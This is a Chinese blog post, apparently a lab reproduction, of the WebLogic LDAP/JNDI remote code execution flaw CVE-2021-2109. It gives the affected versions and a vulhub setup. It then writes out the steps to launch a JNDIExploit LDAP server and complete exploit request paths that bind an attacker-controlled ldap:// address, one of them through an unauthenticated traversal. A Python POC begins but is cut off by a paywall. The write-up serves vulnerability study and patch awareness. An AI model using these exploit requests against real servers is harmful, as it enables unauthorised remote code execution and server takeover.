Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109

最新推荐文章于 2024-05-22 10:01:51 发布
最新推荐文章于 2024-05-22 10:01:51 发布
阅读量3.4k 收藏 2
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46257936/article/details/112984836
版权
本文详细介绍了Oracle Weblogic服务器的CVE-2021-2109 LDAP远程代码执行漏洞,包括漏洞描述、影响版本、环境搭建步骤、漏洞复现过程以及利用POC。该漏洞允许未经身份验证的攻击者进行远程代码执行,CVSS评分为9.8,建议用户尽快修补。
摘要由CSDN通过智能技术生成

Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109

在这里插入图片描述

漏洞描述

2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。

漏洞影响

WebLogic Server 10.3.6.0.0

WebLogic Server 12.1.3.0.0

WebLogic Server 12.2.1.3.0

WebLogic Server 12.2.1.4.0

WebLogic Server 14.1.1.0.0

环境搭建

git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d

访问 http://xxx.xxx.xxx.xxx:7001 正常即可

漏洞复现

访问一下URL http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal

如果有此页面未授权可访问,且在影响范围内则可能出现漏洞

下载漏洞攻击需要的 LDAP启动脚本

下载链接

下载到服务器上启动

java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx (服务器地址)

部分服务器注意放行端口

然后配合 Weblogic未授权范围 命令执行

/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)

注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho 这里 LDAP服务器地址第三个分隔符号为 ;

登录后台可使用此POC,未授权的话用上面的

/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)

漏洞利用POC

注意参数格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分号

如果使用其他的利用Ldap服务请自行更改 POC关键字

此POC仅仅检验有未授权的情况

import requests
import sys
import re
requests
最低0.47元/天 解锁文章
PeiQi_WiKi
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
weblogic LDAP远程代码执行 CVE-2021-2109
课嗨教育的专栏
02-01 2251
漏洞影响版本 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞复现 搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境 访问http://192.168.2.131:7001,出现以下界面说明搭建成功 访问以下路径,如果
WebLogic LDAP远程代码执行漏洞CVE-2021-2109
千寻的博客
02-11 4357
漏洞名称 WebLogic LDAP远程代码执行漏洞 漏洞编号 CVE-2021-2109 JNDI简介 JNDI是Java Naming and Directory Interface (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API (application programing interface,应用程序编程接口)。 漏洞描述 2020年11月19日,阿里云安全向Oracle官方报告了Weblogic Server远程代码执行漏洞
Apache Druid 代码执行漏洞CVE-2021-25646)
最新发布
shierbai的博客
05-22 1334
Apache Druid是一个开源的分布式数据存储。Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞
CVE-2021-2109 Weblogic Server远程代码执行漏洞复现
风雨来花满楼的博客
01-29 708
CVE-2021-2109 Weblogic Server远程代码执行漏洞复现 只为复现 影响版本 Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0 环境搭建 直接用‘.\vulhub-master\weblogic\CVE-2020-14882’漏洞环境
WebLogic_LDAP远程代码执行(CVE-2021-2109)
Longwaer
01-15 1062
学习了解掌握WebLogic_LDAP远程命令执行,更快的知晓中间件的漏洞利用方式及原理。
Weblogic 远程代码执行漏洞CVE-2021-2109复现
Jietewang的博客
01-25 4261
前言 什么是LDAP?Lightweight Directory Access Protocol轻量目录访问协议,基于X.500协议,相对简单且支持定制。于X.500不同的是LDAP支持TCP/IP。 本文主要复现编号为CVE-2021-2109Weblogic JNDI注入远程命令执行漏洞,该漏洞风险为“高”。 影响版本:Weblogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 1. 环境搭建 本次实验使用的靶.
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。 容易利用的漏洞使高特权攻击者可以通过HTTP...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
PeiQi-WIKI-RED:林深时见鹿,海蓝时见鲸:deer:
04-28
PeiQi WiKi-RED文库:ewe: 关于文库 这个文库用于整合互联网上关于渗透测试的资料和技巧,与 相似,PeiQI WiKi-RED文库 同样也是开源面向所有人的,大家可以随时在线翻阅或者下载本地搭建:whale: 公众号和作者 [!NOTE] 更新的文章都会在第一时间推送在公众号,如果对文库有建议或者想要指出错误,可以扫一扫微信加我好友:penguin: 关于使用 文库使用的是,因为风格比较清新,简洁。于是便选择了它来搭建文库。 目前Wiki文库是开源的,每一个人都可以下载随时翻阅:dolphin: [!NOTE] 每个模块都有可用工具,有使用方法和一些技巧 [!NOTE] 部分检测脚本放在POC目录中 如何本地使用 [!NOTE] 1.Github 拉取代码 git clone git clone https://github.com/PeiQi0/wiki.git 2.下载 gitbook a
Weblogic LDAP 远程代码执行漏洞CVE-2021-2109
打工人日记
01-26 1229
CVE-2021-2109 Weblogic Server远程代码执行漏洞 影响范围 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 环境搭建 这个怎么搭都行,推荐采用docker镜像,例如以下两个docker镜像 采用vulhub/weblogic/CVE-2020-14882的镜像(
CVE-2021-2109 Weblogic Server远程代码执行复现
谢公子的博客
02-06 2015
漏洞背景 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。该漏洞Weblogic远程代码执行漏洞,主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行,危险等级高。 漏洞影响版本 Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.
oracle11g远程命令执行漏洞,漏洞应急|Oracle Weblogic Server远程代码执行漏洞CVE-2021-2109)...
weixin_32958777的博客
04-03 889
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。针对以上漏洞,锐捷安全能够进行漏洞扫描与检测,并做安全防护。漏洞复现环境:We...
Weblogic漏洞 CVE-2021-2109 处理
草原孤狼的专栏
09-21 2453
weblogic 20212109 漏洞处理
CVE-2021-2109Weblogic Server远程代码执行漏洞验证及修复
weixin_38896449的博客
03-25 1724
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 2021年1月20日,Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。 2.影响版本 Weblogic Server 10
Weblogic Server远程代码执行漏洞CVE-2021-2109 )复现
good good study
03-03 7065
目录 一. 漏洞描述 二. 影响版本 三. 测试环境搭建 四. 漏洞复现 1. 远程命令执行 2. 反弹shell 五. 漏洞修复 六. 漏洞检测POC 一. 漏洞描述 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值